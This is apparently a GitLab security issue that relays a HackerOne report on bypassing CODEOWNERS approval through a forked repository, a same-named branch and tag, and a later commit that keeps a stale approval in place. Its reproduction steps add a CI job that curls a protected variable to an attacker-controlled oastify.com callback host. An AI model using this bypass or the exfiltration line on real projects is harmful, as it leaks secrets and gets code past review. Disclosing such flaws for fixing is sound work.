Bypassing Codeowners approve using fork repo

Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.

HackerOne report #2418591 by ali_shehab on 2024-03-15, assigned to @rshambhuni:

Report | How To Reproduce

Report

Summary

Hey team hope you are doing well. I found another way to bypass codeowners approvals but this time using a forked repo. Allowing to read protected vars of a private group and pushing code to protected branch.

Steps to reproduce

As an owner:

  1. Create a new group, and apply the ultimate trial to it
  2. Create a new private project in that group
  3. Create a CODEOWNERS file, with the following content
[Code Owners]  
*.yml [@]OWNER_USERNAME
  1. Create a .gitlab-ci.yml file, with the following content
my_job:  
    script:  
        - echo "Hello"
  1. Navigate to https://gitlab.com/GROUP/PROJECT/-/settings/repository, allow developers and maintainers to merge and toggle on code owners approval
  2. Navigate to https://gitlab.com/GROUP/PROJECT/-/settings/merge_requests, and enable Remove approvals by Code Owners if their files changed
  3. Invite a developer to that group

As the developer:

  1. Fork that project
  2. In the forked project, create a new branch called, protected, and add any "safe" change to the .gitlab-ci.yml file, something similar to
my_job:  
    script:  
        - echo "Hello, this is safe"
  1. Create an MR targeting the original project's main branch

As the owner:

  1. Approve the MR, the owner at this point is okay with that code being merged into main as it's safe

As the developer:

  1. In the forked project, create a tag called protected
  2. In the forked project, on the protected branch add any change to the README.md (this doesn't require a code owner approval) - verify that the changes page in the MR is messed up
  3. Back to the forked project, on the protected branch add any evil code to the .gitlab-cicd.yml, something similar to
my_job:  
    script:  
        - echo "Hello, this is safe"

job_name:  
    script:  
        - curl -X GET "https://qlfb8ytseezdfmvtee92juuzeqkg85.oastify.com?VAR=$VAR" # any server controlled by the user
  1. Delete protected tag
  2. On the MR changes page, create a commit that contains any change
  3. Verify that approve persisted, and merge the MR

Impact

Bypassing codeowners approval allowing to read-protected vars of the group and project without having permission, add to that, being able to push unapproved code to protected branches.

How To Reproduce

Please add reproducibility information to this section: